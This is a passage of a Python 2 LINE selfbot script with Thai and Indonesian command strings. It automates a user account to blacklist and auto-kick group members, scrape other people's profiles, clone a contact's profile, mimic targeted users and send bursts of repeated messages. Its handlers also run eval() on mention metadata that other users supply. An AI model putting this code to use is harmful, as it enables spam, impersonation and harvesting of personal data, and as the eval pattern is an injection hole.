json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "ลบแบน @" in msg.text:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("ลบแบน @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear ban","ล้างดำ"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Ban"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unban"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist","Mcheck"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Me ban","Cekban","Mcheck mid"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
#=============================================
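# Per-room feature toggles: simisimi auto-chat, auto-read, auto-respond and
# auto-kick on mention. The flags live in wait/settings and are presumably
# read by the receive loop elsewhere in the script.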
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
cl.sendText(msg.to,"Success activated simisimi")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
cl.sendText(msg.to,"Success deactive simisimi")
elif msg.text in ["เปิด อ่าน","Read on","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"เปิดอ่านข้อความอัตโนมัติ.👌")
elif msg.text in ["ปิด อ่าน","Read off","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"ปิดอ่านข้อความอัตโนมัติ.👌")
elif msg.text in ["Tag on","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto Respon ON")
elif msg.text in ["Tag off","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto Respon OFF")
elif msg.text in ["Tag1","Tag1"]:
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ\n\n" + str(wait["tag1"]))
elif msg.text in ["Tag2","Tag2"]:
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ\n\n" + str(wait["tag2"]))
elif "Tag1:" in msg.text:
wait["tag1"] = msg.text.replace("Tag1: ","")
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ")
elif "Tag2:" in msg.text:
wait["tag2"] = msg.text.replace("Tag2: ","")
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ")
elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"Auto Kick ON")
elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Kick OFF")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
#==============================================================================#
#==============================================================================#
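# "Phackmid:<mid>": sends the contact card plus name, bio, profile picture and
# cover for an arbitrary mid; "#Phackgid:<gid>" dumps the same kind of summary
# for a group the bot has joined.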
elif "Phackmid:" in msg.text:
saya = msg.text.replace("Phackmid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
cl.sendMessage(msg)
contact = cl.getContact(saya)
cu = cl.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)  # match the method casing used everywhere else in this script
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#Phackgid:" in msg.text:
saya = msg.text.replace("#Phackgid:","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).id
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist","เช็คเพื่อนทั้งหมด","#เพื่อน","เพื่อนทั้งหมด","Fyall"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════รายชื่อเพื่อน═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n════════รายชื่อเพื่อย════════\n\nเจำนวนเพื่อน : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["เพื่อน","Memlist","Nameall"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════รายชื่อเพื่อน═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n════════รายชื่อเพื่อน════════\n\nจำนวนเพื่อน : %i" % len(group)
cl.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
contact = cl.getContact(i)
cu = cl.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
elif "#Friendpict:" in msg.text:
saya = msg.text.replace('#Friendpict:','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == saya:
cl.sendImageWithUrl(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Blocklist","บล็อค","Pbann"]:
blockedlist = cl.getBlockedContactIds()
kontak = cl.getContacts(blockedlist)
num=1
msgs="═══════รายชื่อ ที่บล็อค═══════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n══════รายชื่อ ที่บล็อค══════\n\nจำนวนที่บล็อค : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["#Myginfoall"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["#ไอดีกลุ่ม","Myginfogidall"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="════════ไอดี กลุ่ม════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n════════ไอดี กลุ่ม═══════\n\nไอดีกลุ่มรวม : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif "1991258ชื่อกลุ่ม" in msg.text:
saya = msg.text.replace('1991258ชื่อกลุ่ม','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Gid" in msg.text:
saya = msg.text.replace('Gid','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif msg.text in ["ลิสกลุ่ม","#Meginfoall"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif "แทค" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "[SELF BOT\n[By.☬ARIFISTIFIK☬]:\n" + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
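# Lurk tracking: "lurk on" records a read point (message id) for the room; the
# receive loop presumably logs who read past that point into wait2["ROM"], and
# "lurkers" renders them as @mentions with the set/current timestamps.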
elif "lurk on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Lurking already on\nเปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "เปิดการอ่านอัตโนมัต\nSet reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "lurk off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Lurking already off\nปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\nDelete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "lurkers" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Lurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif msg.text in ["เปิดอ่าน","R on","ตั้งเวลา"]:
cl.sendText(msg.to,"lurk on")
elif msg.text in ["ปิดอ่าน","R off"]:
cl.sendText(msg.to,"lurk off")
elif msg.text in ["ใครอ่าน","Ry"]:
cl.sendText(msg.to,"lurkers")
elif msg.text in ["Ry20"]:
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"llurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist","Heckmic"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "• "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Phetmic " in msg.text:
cmd = msg.text.replace("Phetmic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
cl.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
cl.sendImageWithUrl(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
cl.sendVideoWithUrl(msg.to,wait["pap"])
#==============================================================================#
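# "Sk": fires a burst of default LINE stickers. STKPKGID/STKID/STKVER identify
# the sticker package, sticker and version in the message metadata.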
elif msg.text in ["Sk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki1.sendMessage(msg)
elif msg.text.lower() == 'mymid':
cl.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname","Mename"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["ตัส","Mey1"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["รูป","Mey2"]:
h = cl.getContact(mid)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["โปรวีดีโอ","Mey3"]:
h = cl.getContact(mid)
cl.sendVideoWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["ลิ้งรูป","Mey4"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["ปก","Mey5"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
elif msg.text in ["ลิ้งปก","Mey6"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif "#22Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Ph4" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Ph2" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "mh2" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#ดึงรูป" in msg.text:
nk0 = msg.text.replace("#ดึงรูป","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "#pictall" in msg.text:
nk0 = msg.text.replace("#pictall","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
# send both images; the original overwrote path and only ever sent the cover
cl.sendImageWithUrl(msg.to, "http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithUrl(msg.to, str(cu))
except Exception as e:
raise e
elif "เชคหมด" in msg.text:
nk0 = msg.text.replace("เชคหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "Ph3vdo @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Ph3vdo @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithUrl(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Ph3url @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Ph3url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "2url @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("2url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Ph2url @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Ph2url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "เจ้งเตือน" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithUrl(msg.to,path)
elif "แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybb"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
#==========================================================#
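# "[Auto Respond]" echoes a canned image; the Fancytext/Tx/Bx/Tx10 handlers
# below use kedapkedip (flashing/blinking text). Tx sends once, Bx spams the
# effect 38 times via ki1, Tx10 sends it 11 times.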
elif "[Auto Respond]" in msg.text:
cl.sendImageWithUrl(msg.to, "http://dl.profile.line.naver.jp/0hlGvN3GXvM2hLNx8goPtMP3dyPQU8GSIgJVUpCTpiPVtiA3M2clJ-C2hia11mUn04cAJ-DWljOVBj")
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx: " in msg.text:
txt = msg.text.replace("Tx: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Bx: " in msg.text:
txt = msg.text.replace("Bx: ", "")
# flash the text 38 times via ki1 (was 38 copy-pasted calls)
for _ in range(38):
    ki1.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx10: " in msg.text:
txt = msg.text.replace("Tx10: ", "")
# flash the text 11 times (was 11 copy-pasted calls)
for _ in range(11):
    cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
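# The Xx@yy handlers below scrape Google Translate's mobile page and pull the
# translation out of the 'class="t0">' div; this is fragile and breaks
# whenever Google changes the page markup.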
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
